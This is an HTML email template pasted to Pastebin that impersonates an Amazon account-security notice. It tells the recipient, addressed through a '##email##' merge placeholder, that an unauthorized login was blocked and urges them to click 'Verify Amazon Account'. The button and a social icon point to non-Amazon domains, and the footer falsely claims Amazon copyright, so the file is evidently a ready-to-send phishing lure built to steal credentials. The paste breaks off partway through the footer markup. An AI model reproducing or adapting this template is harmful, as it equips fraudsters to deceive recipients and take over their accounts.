Advertisement
Guest User

Untitled

a guest
Jan 25th, 2020
432
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 39.06 KB | None | 0 0
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  2. <html xmlns="http://www.w3.org/1999/xhtml">
  3. <head>
  4. <!-- NAME: 1 COLUMN -->
  5. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  6. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  7. <title>Your Amazon Account</title>
  8.  
  9. <style type="text/css">
  10. body,#bodyTable,#bodyCell{
  11. height:100% !important;
  12. margin:0;
  13. padding:0;
  14. width:100% !important;
  15. }
  16. table{
  17. border-collapse:collapse;
  18. }
  19. img,a img{
  20. border:0;
  21. outline:none;
  22. text-decoration:none;
  23. }
  24. h1,h2,h3,h4,h5,h6{
  25. margin:0;
  26. padding:0;
  27. }
  28. p{
  29. margin:1em 0;
  30. padding:0;
  31. }
  32. a{
  33. word-wrap:break-word;
  34. }
  35. .ReadMsgBody{
  36. width:100%;
  37. }
  38. .ExternalClass{
  39. width:100%;
  40. }
  41. .ExternalClass,.ExternalClass p,.ExternalClass span,.ExternalClass font,.ExternalClass td,.ExternalClass div{
  42. line-height:100%;
  43. }
  44. table,td{
  45. mso-table-lspace:0pt;
  46. mso-table-rspace:0pt;
  47. }
  48. #outlook a{
  49. padding:0;
  50. }
  51. img{
  52. -ms-interpolation-mode:bicubic;
  53. }
  54. body,table,td,p,a,li,blockquote{
  55. -ms-text-size-adjust:100%;
  56. -webkit-text-size-adjust:100%;
  57. }
  58. #templatePreheader,#templateHeader,#templateBody,#templateFooter{
  59. min-width:100%;
  60. }
  61. #bodyCell{
  62. padding:20px;
  63. }
  64. .mcnImage{
  65. vertical-align:bottom;
  66. }
  67. .mcnTextContent img{
  68. height:auto !important;
  69. }
  70. /*
  71. @tab Page
  72. @section background style
  73. @tip Set the background color and top border for your email. You may want to choose colors that match your company's branding.
  74. */
  75. body,#bodyTable{
  76. /*@editable*/background-color:#ffffff;
  77. }
  78. /*
  79. @tab Page
  80. @section background style
  81. @tip Set the background color and top border for your email. You may want to choose colors that match your company's branding.
  82. */
  83. #bodyCell{
  84. /*@editable*/border-top:0;
  85. }
  86. /*
  87. @tab Page
  88. @section email border
  89. @tip Set the border for your email.
  90. */
  91. #templateContainer{
  92. /*@editable*/border:0;
  93. }
  94. /*
  95. @tab Page
  96. @section heading 1
  97. @tip Set the styling for all first-level headings in your emails. These should be the largest of your headings.
  98. @style heading 1
  99. */
  100. h1{
  101. /*@editable*/color:#606060 !important;
  102. display:block;
  103. /*@editable*/font-family:Helvetica;
  104. /*@editable*/font-size:40px;
  105. /*@editable*/font-style:normal;
  106. /*@editable*/font-weight:bold;
  107. /*@editable*/line-height:125%;
  108. /*@editable*/letter-spacing:-1px;
  109. margin:0;
  110. /*@editable*/text-align:left;
  111. }
  112. /*
  113. @tab Page
  114. @section heading 2
  115. @tip Set the styling for all second-level headings in your emails.
  116. @style heading 2
  117. */
  118. h2{
  119. /*@editable*/color:#404040 !important;
  120. display:block;
  121. /*@editable*/font-family:Helvetica;
  122. /*@editable*/font-size:26px;
  123. /*@editable*/font-style:normal;
  124. /*@editable*/font-weight:bold;
  125. /*@editable*/line-height:125%;
  126. /*@editable*/letter-spacing:-.75px;
  127. margin:0;
  128. /*@editable*/text-align:left;
  129. }
  130. /*
  131. @tab Page
  132. @section heading 3
  133. @tip Set the styling for all third-level headings in your emails.
  134. @style heading 3
  135. */
  136. h3{
  137. /*@editable*/color:#606060 !important;
  138. display:block;
  139. /*@editable*/font-family:Helvetica;
  140. /*@editable*/font-size:18px;
  141. /*@editable*/font-style:normal;
  142. /*@editable*/font-weight:bold;
  143. /*@editable*/line-height:125%;
  144. /*@editable*/letter-spacing:-.5px;
  145. margin:0;
  146. /*@editable*/text-align:left;
  147. }
  148. /*
  149. @tab Page
  150. @section heading 4
  151. @tip Set the styling for all fourth-level headings in your emails. These should be the smallest of your headings.
  152. @style heading 4
  153. */
  154. h4{
  155. /*@editable*/color:#808080 !important;
  156. display:block;
  157. /*@editable*/font-family:Helvetica;
  158. /*@editable*/font-size:16px;
  159. /*@editable*/font-style:normal;
  160. /*@editable*/font-weight:bold;
  161. /*@editable*/line-height:125%;
  162. /*@editable*/letter-spacing:normal;
  163. margin:0;
  164. /*@editable*/text-align:left;
  165. }
  166. /*
  167. @tab Preheader
  168. @section preheader style
  169. @tip Set the background color and borders for your email's preheader area.
  170. */
  171. #templatePreheader{
  172. /*@editable*/background-color:#FFFFFF;
  173. /*@editable*/border-top:0;
  174. /*@editable*/border-bottom:0;
  175. }
  176. /*
  177. @tab Preheader
  178. @section preheader text
  179. @tip Set the styling for your email's preheader text. Choose a size and color that is easy to read.
  180. */
  181. .preheaderContainer .mcnTextContent,.preheaderContainer .mcnTextContent p{
  182. /*@editable*/color:#606060;
  183. /*@editable*/font-family:Helvetica;
  184. /*@editable*/font-size:11px;
  185. /*@editable*/line-height:125%;
  186. /*@editable*/text-align:left;
  187. }
  188. /*
  189. @tab Preheader
  190. @section preheader link
  191. @tip Set the styling for your email's header links. Choose a color that helps them stand out from your text.
  192. */
  193. .preheaderContainer .mcnTextContent a{
  194. /*@editable*/color:#606060;
  195. /*@editable*/font-weight:normal;
  196. /*@editable*/text-decoration:underline;
  197. }
  198. /*
  199. @tab Header
  200. @section header style
  201. @tip Set the background color and borders for your email's header area.
  202. */
  203. #templateHeader{
  204. /*@editable*/background-color:#FFFFFF;
  205. /*@editable*/border-top:0;
  206. /*@editable*/border-bottom:0;
  207. }
  208. /*
  209. @tab Header
  210. @section header text
  211. @tip Set the styling for your email's header text. Choose a size and color that is easy to read.
  212. */
  213. .headerContainer .mcnTextContent,.headerContainer .mcnTextContent p{
  214. /*@editable*/color:#606060;
  215. /*@editable*/font-family:Helvetica;
  216. /*@editable*/font-size:15px;
  217. /*@editable*/line-height:150%;
  218. /*@editable*/text-align:left;
  219. }
  220. /*
  221. @tab Header
  222. @section header link
  223. @tip Set the styling for your email's header links. Choose a color that helps them stand out from your text.
  224. */
  225. .headerContainer .mcnTextContent a{
  226. /*@editable*/color:#6DC6DD;
  227. /*@editable*/font-weight:normal;
  228. /*@editable*/text-decoration:underline;
  229. }
  230. /*
  231. @tab Body
  232. @section body style
  233. @tip Set the background color and borders for your email's body area.
  234. */
  235. #templateBody{
  236. /*@editable*/background-color:#FFFFFF;
  237. /*@editable*/border-top:0;
  238. /*@editable*/border-bottom:0;
  239. }
  240. /*
  241. @tab Body
  242. @section body text
  243. @tip Set the styling for your email's body text. Choose a size and color that is easy to read.
  244. */
  245. .bodyContainer .mcnTextContent,.bodyContainer .mcnTextContent p{
  246. /*@editable*/color:#606060;
  247. /*@editable*/font-family:Helvetica;
  248. /*@editable*/font-size:15px;
  249. /*@editable*/line-height:150%;
  250. /*@editable*/text-align:left;
  251. }
  252. /*
  253. @tab Body
  254. @section body link
  255. @tip Set the styling for your email's body links. Choose a color that helps them stand out from your text.
  256. */
  257. .bodyContainer .mcnTextContent a{
  258. /*@editable*/color:#6DC6DD;
  259. /*@editable*/font-weight:normal;
  260. /*@editable*/text-decoration:underline;
  261. }
  262. /*
  263. @tab Footer
  264. @section footer style
  265. @tip Set the background color and borders for your email's footer area.
  266. */
  267. #templateFooter{
  268. /*@editable*/background-color:#ffffff;
  269. /*@editable*/border-top:0;
  270. /*@editable*/border-bottom:0;
  271. }
  272. /*
  273. @tab Footer
  274. @section footer text
  275. @tip Set the styling for your email's footer text. Choose a size and color that is easy to read.
  276. */
  277. .footerContainer .mcnTextContent,.footerContainer .mcnTextContent p{
  278. /*@editable*/color:#000000;
  279. /*@editable*/font-family:Helvetica;
  280. /*@editable*/font-size:9px;
  281. /*@editable*/line-height:150%;
  282. /*@editable*/text-align:left;
  283. }
  284. /*
  285. @tab Footer
  286. @section footer link
  287. @tip Set the styling for your email's footer links. Choose a color that helps them stand out from your text.
  288. */
  289. .footerContainer .mcnTextContent a{
  290. /*@editable*/color:#000000;
  291. /*@editable*/font-weight:normal;
  292. /*@editable*/text-decoration:underline;
  293. }
  294. @media only screen and (max-width: 480px){
  295. body,table,td,p,a,li,blockquote{
  296. -webkit-text-size-adjust:none !important;
  297. }
  298.  
  299. } @media only screen and (max-width: 480px){
  300. body{
  301. width:100% !important;
  302. min-width:100% !important;
  303. }
  304.  
  305. } @media only screen and (max-width: 480px){
  306. td[id=bodyCell]{
  307. padding:10px !important;
  308. }
  309.  
  310. } @media only screen and (max-width: 480px){
  311. table[class=mcnTextContentContainer]{
  312. width:100% !important;
  313. }
  314.  
  315. } @media only screen and (max-width: 480px){
  316. .mcnBoxedTextContentContainer{
  317. max-width:100% !important;
  318. min-width:100% !important;
  319. width:100% !important;
  320. }
  321.  
  322. } @media only screen and (max-width: 480px){
  323. table[class=mcpreview-image-uploader]{
  324. width:100% !important;
  325. display:none !important;
  326. }
  327.  
  328. } @media only screen and (max-width: 480px){
  329. img[class=mcnImage]{
  330. width:100% !important;
  331. }
  332.  
  333. } @media only screen and (max-width: 480px){
  334. table[class=mcnImageGroupContentContainer]{
  335. width:100% !important;
  336. }
  337.  
  338. } @media only screen and (max-width: 480px){
  339. td[class=mcnImageGroupContent]{
  340. padding:9px !important;
  341. }
  342.  
  343. } @media only screen and (max-width: 480px){
  344. td[class=mcnImageGroupBlockInner]{
  345. padding-bottom:0 !important;
  346. padding-top:0 !important;
  347. }
  348.  
  349. } @media only screen and (max-width: 480px){
  350. tbody[class=mcnImageGroupBlockOuter]{
  351. padding-bottom:9px !important;
  352. padding-top:9px !important;
  353. }
  354.  
  355. } @media only screen and (max-width: 480px){
  356. table[class=mcnCaptionTopContent],table[class=mcnCaptionBottomContent]{
  357. width:100% !important;
  358. }
  359.  
  360. } @media only screen and (max-width: 480px){
  361. table[class=mcnCaptionLeftTextContentContainer],table[class=mcnCaptionRightTextContentContainer],table[class=mcnCaptionLeftImageContentContainer],table[class=mcnCaptionRightImageContentContainer],table[class=mcnImageCardLeftTextContentContainer],table[class=mcnImageCardRightTextContentContainer]{
  362. width:100% !important;
  363. }
  364.  
  365. } @media only screen and (max-width: 480px){
  366. td[class=mcnImageCardLeftImageContent],td[class=mcnImageCardRightImageContent]{
  367. padding-right:18px !important;
  368. padding-left:18px !important;
  369. padding-bottom:0 !important;
  370. }
  371.  
  372. } @media only screen and (max-width: 480px){
  373. td[class=mcnImageCardBottomImageContent]{
  374. padding-bottom:9px !important;
  375. }
  376.  
  377. } @media only screen and (max-width: 480px){
  378. td[class=mcnImageCardTopImageContent]{
  379. padding-top:18px !important;
  380. }
  381.  
  382. } @media only screen and (max-width: 480px){
  383. td[class=mcnImageCardLeftImageContent],td[class=mcnImageCardRightImageContent]{
  384. padding-right:18px !important;
  385. padding-left:18px !important;
  386. padding-bottom:0 !important;
  387. }
  388.  
  389. } @media only screen and (max-width: 480px){
  390. td[class=mcnImageCardBottomImageContent]{
  391. padding-bottom:9px !important;
  392. }
  393.  
  394. } @media only screen and (max-width: 480px){
  395. td[class=mcnImageCardTopImageContent]{
  396. padding-top:18px !important;
  397. }
  398.  
  399. } @media only screen and (max-width: 480px){
  400. table[class=mcnCaptionLeftContentOuter] td[class=mcnTextContent],table[class=mcnCaptionRightContentOuter] td[class=mcnTextContent]{
  401. padding-top:9px !important;
  402. }
  403.  
  404. } @media only screen and (max-width: 480px){
  405. td[class=mcnCaptionBlockInner] table[class=mcnCaptionTopContent]:last-child td[class=mcnTextContent]{
  406. padding-top:18px !important;
  407. }
  408.  
  409. } @media only screen and (max-width: 480px){
  410. td[class=mcnBoxedTextContentColumn]{
  411. padding-left:18px !important;
  412. padding-right:18px !important;
  413. }
  414.  
  415. } @media only screen and (max-width: 480px){
  416. td[class=mcnTextContent]{
  417. padding-right:18px !important;
  418. padding-left:18px !important;
  419. }
  420.  
  421. } @media only screen and (max-width: 480px){
  422. /*
  423. @tab Mobile Styles
  424. @section template width
  425. @tip Make the template fluid for portrait or landscape view adaptability. If a fluid layout doesn't work for you, set the width to 300px instead.
  426. */
  427. table[id=templateContainer],table[id=templatePreheader],table[id=templateHeader],table[id=templateBody],table[id=templateFooter]{
  428. /*@tab Mobile Styles
  429. @section template width
  430. @tip Make the template fluid for portrait or landscape view adaptability. If a fluid layout doesn't work for you, set the width to 300px instead.*/max-width:600px !important;
  431. /*@editable*/width:100% !important;
  432. }
  433.  
  434. } @media only screen and (max-width: 480px){
  435. /*
  436. @tab Mobile Styles
  437. @section heading 1
  438. @tip Make the first-level headings larger in size for better readability on small screens.
  439. */
  440. h1{
  441. /*@editable*/font-size:24px !important;
  442. /*@editable*/line-height:125% !important;
  443. }
  444.  
  445. } @media only screen and (max-width: 480px){
  446. /*
  447. @tab Mobile Styles
  448. @section heading 2
  449. @tip Make the second-level headings larger in size for better readability on small screens.
  450. */
  451. h2{
  452. /*@editable*/font-size:20px !important;
  453. /*@editable*/line-height:125% !important;
  454. }
  455.  
  456. } @media only screen and (max-width: 480px){
  457. /*
  458. @tab Mobile Styles
  459. @section heading 3
  460. @tip Make the third-level headings larger in size for better readability on small screens.
  461. */
  462. h3{
  463. /*@editable*/font-size:18px !important;
  464. /*@editable*/line-height:125% !important;
  465. }
  466.  
  467. } @media only screen and (max-width: 480px){
  468. /*
  469. @tab Mobile Styles
  470. @section heading 4
  471. @tip Make the fourth-level headings larger in size for better readability on small screens.
  472. */
  473. h4{
  474. /*@editable*/font-size:16px !important;
  475. /*@editable*/line-height:125% !important;
  476. }
  477.  
  478. } @media only screen and (max-width: 480px){
  479. /*
  480. @tab Mobile Styles
  481. @section Boxed Text
  482. @tip Make the boxed text larger in size for better readability on small screens. We recommend a font size of at least 16px.
  483. */
  484. table[class=mcnBoxedTextContentContainer] td[class=mcnTextContent],td[class=mcnBoxedTextContentContainer] td[class=mcnTextContent] p{
  485. /*@editable*/font-size:18px !important;
  486. /*@editable*/line-height:125% !important;
  487. }
  488.  
  489. } @media only screen and (max-width: 480px){
  490. /*
  491. @tab Mobile Styles
  492. @section Preheader Visibility
  493. @tip Set the visibility of the email's preheader on small screens. You can hide it to save space.
  494. */
  495. table[id=templatePreheader]{
  496. /*@editable*/display:none !important;
  497. }
  498.  
  499. } @media only screen and (max-width: 480px){
  500. /*
  501. @tab Mobile Styles
  502. @section Preheader Text
  503. @tip Make the preheader text larger in size for better readability on small screens.
  504. */
  505. td[class=preheaderContainer] td[class=mcnTextContent],td[class=preheaderContainer] td[class=mcnTextContent] p{
  506. /*@editable*/font-size:14px !important;
  507. /*@editable*/line-height:115% !important;
  508. }
  509.  
  510. } @media only screen and (max-width: 480px){
  511. /*
  512. @tab Mobile Styles
  513. @section Header Text
  514. @tip Make the header text larger in size for better readability on small screens.
  515. */
  516. td[class=headerContainer] td[class=mcnTextContent],td[class=headerContainer] td[class=mcnTextContent] p{
  517. /*@editable*/font-size:18px !important;
  518. /*@editable*/line-height:125% !important;
  519. }
  520.  
  521. } @media only screen and (max-width: 480px){
  522. /*
  523. @tab Mobile Styles
  524. @section Body Text
  525. @tip Make the body text larger in size for better readability on small screens. We recommend a font size of at least 16px.
  526. */
  527. td[class=bodyContainer] td[class=mcnTextContent],td[class=bodyContainer] td[class=mcnTextContent] p{
  528. /*@editable*/font-size:12px !important;
  529. /*@editable*/line-height:150% !important;
  530. }
  531.  
  532. } @media only screen and (max-width: 480px){
  533. /*
  534. @tab Mobile Styles
  535. @section footer text
  536. @tip Make the body content text larger in size for better readability on small screens.
  537. */
  538. td[class=footerContainer] td[class=mcnTextContent],td[class=footerContainer] td[class=mcnTextContent] p{
  539. /*@editable*/font-size:12px !important;
  540. /*@editable*/line-height:150% !important;
  541. }
  542.  
  543. } @media only screen and (max-width: 480px){
  544. td[class=footerContainer] a[class=utilityLink]{
  545. display:block !important;
  546. }
  547.  
  548. }</style></head>
  549. <body leftmargin="0" marginwidth="0" topmargin="0" marginheight="0" offset="0">
  550. <center>
  551. <table align="center" border="0" cellpadding="0" cellspacing="0" height="100%" width="100%" id="bodyTable">
  552. <tr>
  553. <td align="center" valign="top" id="bodyCell">
  554. <!-- BEGIN TEMPLATE // -->
  555. <table border="0" cellpadding="0" cellspacing="0" width="600" id="templateContainer">
  556. <tr>
  557. <td align="center" valign="top">
  558. <!-- BEGIN PREHEADER // -->
  559. <table border="0" cellpadding="0" cellspacing="0" width="600" id="templatePreheader">
  560. <tr>
  561. <td valign="top" class="preheaderContainer" style="padding-top:9px;"></td>
  562. </tr>
  563. </table>
  564. <!-- // END PREHEADER -->
  565. </td>
  566. </tr>
  567. <tr>
  568. <td align="center" valign="top">
  569. <!-- BEGIN HEADER // -->
  570. <table border="0" cellpadding="0" cellspacing="0" width="600" id="templateHeader">
  571. <tr>
  572. <td valign="top" class="headerContainer"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnImageBlock" style="min-width:100%;">
  573. <tbody class="mcnImageBlockOuter">
  574. <tr>
  575. <td valign="top" style="padding:9px" class="mcnImageBlockInner">
  576. <table align="left" width="100%" border="0" cellpadding="0" cellspacing="0" class="mcnImageContentContainer" style="min-width:100%;">
  577. <tbody><tr>
  578. <td class="mcnImageContent" valign="top" style="padding-right: 9px; padding-left: 9px; padding-top: 0; padding-bottom: 0;">
  579.  
  580.  
  581. <img align="left" alt="Amazon Logo" src="http://logok.org/wp-content/uploads/2015/01/Amazon-logo.png" width="179" style="max-width:358px; padding-bottom: 0; display: inline !important; vertical-align: bottom;" class="mcnImage">
  582.  
  583.  
  584. </td>
  585. </tr>
  586. </tbody></table>
  587. </td>
  588. </tr>
  589. </tbody>
  590. </table><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnDividerBlock" style="min-width:100%;">
  591. <tbody class="mcnDividerBlockOuter">
  592. <tr>
  593. <td class="mcnDividerBlockInner" style="min-width:100%; padding:18px;">
  594. <table class="mcnDividerContent" border="0" cellpadding="0" cellspacing="0" width="100%" style="min-width: 100%;border-top-width: 2px;border-top-style: solid;border-top-color: #EAEAEA;">
  595. <tbody><tr>
  596. <td>
  597. <span></span>
  598. </td>
  599. </tr>
  600. </tbody></table>
  601. <!--
  602. <td class="mcnDividerBlockInner" style="padding: 18px;">
  603. <hr class="mcnDividerContent" style="border-bottom-color:none; border-left-color:none; border-right-color:none; border-bottom-width:0; border-left-width:0; border-right-width:0; margin-top:0; margin-right:0; margin-bottom:0; margin-left:0;" />
  604. -->
  605. </td>
  606. </tr>
  607. </tbody>
  608. </table><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnTextBlock" style="min-width:100%;">
  609. <tbody class="mcnTextBlockOuter">
  610. <tr>
  611. <td valign="top" class="mcnTextBlockInner">
  612.  
  613. <table align="left" border="0" cellpadding="0" cellspacing="0" width="100%" style="min-width:100%;" class="mcnTextContentContainer">
  614. <tbody><tr>
  615.  
  616. <td valign="top" class="mcnTextContent" style="padding: 9px 18px;color: #000000;font-size: 16px;font-style: normal;font-weight: bold;">
  617.  
  618. Your Amazon Account Needs verification.
  619. </td>
  620. </tr>
  621. </tbody></table>
  622.  
  623. </td>
  624. </tr>
  625. </tbody>
  626. </table></td>
  627. </tr>
  628. </table>
  629. <!-- // END HEADER -->
  630. </td>
  631. </tr>
  632. <tr>
  633. <td align="center" valign="top">
  634. <!-- BEGIN BODY // -->
  635. <table border="0" cellpadding="0" cellspacing="0" width="600" id="templateBody">
  636. <tr>
  637. <td valign="top" class="bodyContainer"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnTextBlock" style="min-width:100%;">
  638. <tbody class="mcnTextBlockOuter">
  639. <tr>
  640. <td valign="top" class="mcnTextBlockInner">
  641.  
  642. <table align="left" border="0" cellpadding="0" cellspacing="0" width="100%" style="min-width:100%;" class="mcnTextContentContainer">
  643. <tbody><tr>
  644.  
  645. <td valign="top" class="mcnTextContent" style="padding: 9px 18px;color: #000000;font-family: Tahoma, Verdana, Segoe, sans-serif;font-size: 14px;font-weight: normal;line-height: 150%;">
  646.  
  647. <span style="color: #000000;line-height: 20.8px;">Hi&nbsp;</span><span style="color: #000000;line-height: 20.8px;">Dear ##email##</span>
  648.  
  649. <p class="p1" style="line-height: 150%;color: #000000;font-family: Tahoma, Verdana, Segoe, sans-serif;font-size: 14px;font-weight: normal;"><span style="line-height:20.8px">We just wanted to let you know that a recent&nbsp;Unauthorized&nbsp;login was found in your Amazon account&nbsp;Which is blocked successfuly.</span></p>
  650.  
  651. <p class="p2" style="line-height: 150%;color: #000000;font-family: Tahoma, Verdana, Segoe, sans-serif;font-size: 14px;font-weight: normal;">You can't use your account&nbsp;at&nbsp;the movement,Please Verify And Secure your account by following link</p>
  652.  
  653. </td>
  654. </tr>
  655. </tbody></table>
  656.  
  657. </td>
  658. </tr>
  659. </tbody>
  660. </table><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnButtonBlock" style="min-width:100%;">
  661. <tbody class="mcnButtonBlockOuter">
  662. <tr>
  663. <td style="padding-top:0; padding-right:18px; padding-bottom:18px; padding-left:18px;" valign="top" align="center" class="mcnButtonBlockInner">
  664. <table border="0" cellpadding="0" cellspacing="0" class="mcnButtonContentContainer" style="border-collapse: separate !important;border-radius: 12px;background-color: #F7930A;">
  665. <tbody>
  666. <tr>
  667. <td align="center" valign="middle" class="mcnButtonContent" style="font-family: Tahoma, Verdana, Segoe, sans-serif; font-size: 16px; padding: 12px;">
  668. <a class="mcnButton " title="Login Amazon" href="https://purchasing-shop-market.net/" target="_blank" style="font-weight: normal;letter-spacing: normal;line-height: 100%;text-align: center;text-decoration: none;color: #FFFFFF;">Verify Amazon Account</a>
  669. </td>
  670. </tr>
  671. </tbody>
  672. </table>
  673. </td>
  674. </tr>
  675. </tbody>
  676. </table><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnTextBlock" style="min-width:100%;">
  677. <tbody class="mcnTextBlockOuter">
  678. <tr>
  679. <td valign="top" class="mcnTextBlockInner" style="padding-top:9px;">
  680. <!--[if mso]>
  681. <table align="left" border="0" cellspacing="0" cellpadding="0" width="100%" style="width:100%;">
  682. <tr>
  683. <![endif]-->
  684.  
  685. <!--[if mso]>
  686. <td valign="top" width="600" style="width:600px;">
  687. <![endif]-->
  688. <table align="left" border="0" cellpadding="0" cellspacing="0" style="max-width:100%; min-width:100%;" width="100%" class="mcnTextContentContainer">
  689. <tbody><tr>
  690.  
  691. <td valign="top" class="mcnTextContent" style="padding: 0px 18px 9px;color: #000000;font-family: Tahoma, Verdana, Segoe, sans-serif;font-size: 14px;">
  692.  
  693. <span class="s1" style="line-height:20.8px">Kind regards,</span><br style="line-height: 20.8px;">
  694. <span style="line-height:1.6em">Amazon Team</span>
  695. </td>
  696. </tr>
  697. </tbody></table>
  698. <!--[if mso]>
  699. </td>
  700. <![endif]-->
  701.  
  702. <!--[if mso]>
  703. </tr>
  704. </table>
  705. <![endif]-->
  706. </td>
  707. </tr>
  708. </tbody>
  709. </table></td>
  710. </tr>
  711. </table>
  712. <!-- // END BODY -->
  713. </td>
  714. </tr>
  715. <tr>
  716. <td align="center" valign="top">
  717. <!-- BEGIN FOOTER // -->
  718. <table border="0" cellpadding="0" cellspacing="0" width="600" id="templateFooter">
  719. <tr>
  720. <td valign="top" class="footerContainer" style="padding-bottom:9px;"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnDividerBlock" style="min-width:100%;">
  721. <tbody class="mcnDividerBlockOuter">
  722. <tr>
  723. <td class="mcnDividerBlockInner" style="min-width:100%; padding:18px;">
  724. <table class="mcnDividerContent" border="0" cellpadding="0" cellspacing="0" width="100%" style="min-width: 100%;border-top-width: 2px;border-top-style: solid;border-top-color: #EAEAEA;">
  725. <tbody><tr>
  726. <td>
  727. <span></span>
  728. </td>
  729. </tr>
  730. </tbody></table>
  731. <!--
  732. <td class="mcnDividerBlockInner" style="padding: 18px;">
  733. <hr class="mcnDividerContent" style="border-bottom-color:none; border-left-color:none; border-right-color:none; border-bottom-width:0; border-left-width:0; border-right-width:0; margin-top:0; margin-right:0; margin-bottom:0; margin-left:0;" />
  734. -->
  735. </td>
  736. </tr>
  737. </tbody>
  738. </table><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnTextBlock" style="min-width:100%;">
  739. <tbody class="mcnTextBlockOuter">
  740. <tr>
  741. <td valign="top" class="mcnTextBlockInner" style="padding-top:9px;">
  742. <!--[if mso]>
  743. <table align="left" border="0" cellspacing="0" cellpadding="0" width="100%" style="width:100%;">
  744. <tr>
  745. <![endif]-->
  746.  
  747. <!--[if mso]>
  748. <td valign="top" width="600" style="width:600px;">
  749. <![endif]-->
  750. <table align="left" border="0" cellpadding="0" cellspacing="0" style="max-width:100%; min-width:100%;" width="100%" class="mcnTextContentContainer">
  751. <tbody><tr>
  752.  
  753. <td valign="top" class="mcnTextContent" style="padding: 0px 18px 9px; font-size: 12px; text-align: center;">
  754.  
  755. <p class="p1" style="font-size: 12px; text-align: center;"><span class="s1">This email was sent to keep you informed about changes to your products or accounts.&nbsp;<br>
  756. Copyright 2013 - 2016&nbsp;Amazon Ltd. All rights reserved. We are located at THE ACCOUNTANCY CLOUD, Unit 2.05 12 -18 Hoxton Street, London, England, N1 6NG</span></p>
  757.  
  758. </td>
  759. </tr>
  760. </tbody></table>
  761. <!--[if mso]>
  762. </td>
  763. <![endif]-->
  764.  
  765. <!--[if mso]>
  766. </tr>
  767. </table>
  768. <![endif]-->
  769. </td>
  770. </tr>
  771. </tbody>
  772. </table><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnFollowBlock" style="min-width:100%;">
  773. <tbody class="mcnFollowBlockOuter">
  774. <tr>
  775. <td align="center" valign="top" style="padding:9px" class="mcnFollowBlockInner">
  776. <table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnFollowContentContainer" style="min-width:100%;">
  777. <tbody><tr>
  778. <td align="center" style="padding-left:9px;padding-right:9px;">
  779. <table border="0" cellpadding="0" cellspacing="0" width="100%" style="min-width: 100%;background-color: #FFFFFF;" class="mcnFollowContent">
  780. <tbody><tr>
  781. <td align="center" valign="top" style="padding-top:9px; padding-right:9px; padding-left:9px;">
  782. <table align="center" border="0" cellpadding="0" cellspacing="0">
  783. <tbody><tr>
  784. <td align="center" valign="top">
  785. <!--[if mso]>
  786. <table align="center" border="0" cellspacing="0" cellpadding="0">
  787. <tr>
  788. <![endif]-->
  789.  
  790. <!--[if mso]>
  791. <td align="center" valign="top">
  792. <![endif]-->
  793.  
  794.  
  795. <table align="left" border="0" cellpadding="0" cellspacing="0" style="display:inline;">
  796. <tbody><tr>
  797. <td valign="top" style="padding-right:10px; padding-bottom:9px;" class="mcnFollowContentItemContainer">
  798. <table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnFollowContentItem">
  799. <tbody><tr>
  800. <td align="left" valign="middle" style="padding-top:5px; padding-right:10px; padding-bottom:5px; padding-left:9px;">
  801. <table align="left" border="0" cellpadding="0" cellspacing="0" width="">
  802. <tbody><tr>
  803.  
  804. <td align="center" valign="middle" width="24" class="mcnFollowIconContent">
  805. <a href="https://jasco-community.com/amzn/locked" target="_blank"><img src="http://cdn-images.mailchimp.com/icons/social-block-v2/outline-gray-facebook-48.png" style="display:block;" height="24" width="24" class=""></a>
  806. </td>
  807.  
  808.  
  809. </tr>
  810. </tbody></table>
  811. </td>
  812. </tr>
  813. </tbody></table>
  814. </td>
  815. </tr>
  816. </tbody></table>
  817.  
  818. <!--[if mso]>
  819. </td>
  820. <![endif]-->
  821.  
  822. <!--[if mso]>
  823. <td align="center" valign="top">
  824. <![endif]-->
  825.  
  826.  
  827. <table align="left" border="0" cellpadding="0" cellspacing="0" style="display:inline;">
  828. <tbody><tr>
  829. <td valign="top" style="padding-right:10px; padding-bottom:9px;" class="mcnFollowContentItemContainer">
  830. <table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnFollowContentItem">
  831. <tbody><tr>
  832. <td align="left" valign="middle" style="padding-top:5px; padding-right:10px; padding-bottom:5px; padding-left:9px;">
  833. <table align="left" border="0" cellpadding="0" cellspacing="0" width="">
  834. <tbody><tr>
  835.  
  836. <td align="center" valign="middle" width="24" class="mcnFollowIconContent">
  837. <a href="https://purchasing-shop-market.net/" target="_blank"><img src="http://cdn-images.mailchimp.com/icons/social-block-v2/outline-gray-twitter-48.png" style="display:block;" height="24" width="24" class=""></a>
  838. </td>
  839.  
  840.  
  841. </tr>
  842. </tbody></table>
  843. </td>
  844. </tr>
  845. </tbody></table>
  846. </td>
  847. </tr>
  848. </tbody></table>
  849.  
  850. <!--[if mso]>
  851. </td>
  852. <![endif]-->
  853.  
  854. <!--[if mso]>
  855. <td align="center" valign="top">
  856. <![endif]-->
  857.  
  858.  
  859. <table align="left" border="0" cellpadding="0" cellspacing="0" style="display:inline;">
  860. <tbody><tr>
  861. <td valign="top" style="padding-right:0; padding-bottom:9px;" class="mcnFollowContentItemContainer">
  862. <table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnFollowContentItem">
  863. <tbody><tr>
  864. <td align="left" valign="middle" style="padding-top:5px; padding-right:10px; padding-bottom:5px; padding-left:9px;">
  865. <table align="left" border="0" cellpadding="0" cellspacing="0" width="">
  866. <tbody><tr>
  867.  
  868. <td align="center" valign="middle" width="24" class="mcnFollowIconContent">
